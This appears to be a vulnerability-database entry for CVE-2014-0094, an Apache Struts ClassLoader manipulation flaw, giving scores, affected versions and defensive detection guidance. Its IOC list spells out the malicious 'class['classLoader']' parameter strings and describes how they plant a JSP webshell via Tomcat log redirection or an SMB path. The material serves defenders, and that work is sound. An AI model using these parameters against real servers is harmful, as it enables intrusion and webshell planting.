cbcvebase.
CVE-2014-0094
published 2014-03-11

CVE-2014-0094: The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to…

PriorityP276medium5CVSS 2.0
AVNACLAuNCNIPAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
99.61%
99.9th percentile
The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method.

Affected

2 ranges
VendorProductVersion rangeFixed in
apachestruts>= 2.0.0 < 2.3.16.22.3.16.2
apachestruts>= 2.0.0 < 2.3.16.12.3.16.1

Detection & IOCsextracted from sources · hover to see the quote

url/struts2-blank/example/HelloWorld.action
port8080
commandclass['classLoader'].resources.context.parent.pipeline.first.directory
commandclass['classLoader'].resources.context.parent.pipeline.first.prefix
commandclass['classLoader'].resources.context.parent.pipeline.first.suffix
commandclass['classLoader'].resources.context.parent.pipeline.first.fileDateFormat
commandclass.classLoader.resources.context.parent.pipeline.first.directory
commandclass['classLoader'].resources.dirContext.docBase
pathwebapps/ROOT
  • Detect HTTP GET requests containing ClassLoader manipulation parameters targeting 'class[' or 'class.classLoader' in query strings, particularly with pipeline configuration sub-keys (directory, prefix, suffix, fileDateFormat).
  • For Struts 1.x exploitation, look for the parameter name pattern 'class.classLoader' in HTTP requests; for Struts 2.x look for 'class[\'classLoader\']' — both are used to reach getClass() and manipulate the ClassLoader.
  • The exploit writes a JSP webshell to 'webapps/ROOT' by redirecting Tomcat's access log via ClassLoader manipulation; monitor for unexpected .jsp files appearing in the web root shortly after suspicious GET requests.
  • For Windows/SMB variant, detect GET requests containing 'class[\'classLoader\'].resources.dirContext.docBase' pointing to a UNC path (\\host\share), indicating an attempt to load a remote SMB-hosted payload.
  • The vulnerability is in ParametersInterceptor (Struts 2.x) and ActionForm bean population (Struts 1.x) — both allow the 'class' parameter to be passed to getClass(), enabling ClassLoader manipulation via crafted HTTP request parameters.
  • ·The Struts 1.x attack vector uses dot-notation ('class.classLoader') while Struts 2.x uses bracket-notation ('class[\'classLoader\']'). Detection rules must cover both syntactic forms to avoid blind spots.
  • ·CVE-2014-0094 affects Apache Struts 2.x before 2.3.16.2; CVE-2014-0112 is an incomplete-fix bypass affecting Struts before 2.3.20. Detections should account for both vulnerability variants as they share the same exploitation technique.
  • ·A related variant (CVE-2014-0113) exploits the same ClassLoader manipulation via CookieInterceptor when a wildcard cookiesName value is used, requiring cookie-header-based detection in addition to query-parameter detection.

CVSS provenance

nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
ghsa5.0MEDIUM
osv5.0MEDIUM
vulncheck5.0MEDIUM
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.